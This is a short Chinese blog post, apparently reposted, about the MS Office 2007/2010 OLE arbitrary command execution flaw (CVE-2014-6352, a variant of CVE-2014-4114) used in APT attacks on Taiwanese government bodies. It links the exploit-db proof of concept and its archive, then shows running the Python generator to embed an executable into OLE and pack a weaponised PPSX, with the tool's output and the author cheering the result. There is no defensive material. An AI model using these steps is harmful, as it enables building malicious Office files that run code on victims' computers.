MS Office 2007 and 2010 - OLE Arbitrary Command Execution

标签：blog   http   io   ar   sp   strong   文件   on   2014   

之前看到freebuf上面的一篇文章，被台湾黑客拿去搞APT。期待了好久，终于放出POC了。

Xecure lab在10月17号发现变种的0day漏洞 沙虫（CVE-2014-4114 ）已经被用在针对台湾政府以及各单位的APT攻击中，目前主流的杀毒软件还没办法有效地检测。该变种能够直接内嵌恶意软件，并本地触发执行，不需要再从远程共享服务器上下载恶意代码。

http://www.freebuf.com/vuls/48601.html

http://www.exploit-db.com/exploits/35229/

下载  http://www.exploit-db.com/sploits/35216.rar  解压

我在tmp同目录下放入一个exe文件

然后用python脚本生成

E:\tools\tools\35216>E:\tools\tools\35216\CVE-2014-6352.py E:\tools\tools\35216\
cmd.exe
[+] Injected exe into OLE
[+] packing exploit ppsx
[+] Done

E:\tools\tools\35216>

生成成功

打开PPSX文件，弹弹弹弹弹！！！

MS Office 2007 and 2010 - OLE Arbitrary Command Execution

标签：blog   http   io   ar   sp   strong   文件   on   2014   

原文地址：http://www.cnblogs.com/Le30bjectNs11/p/4096692.html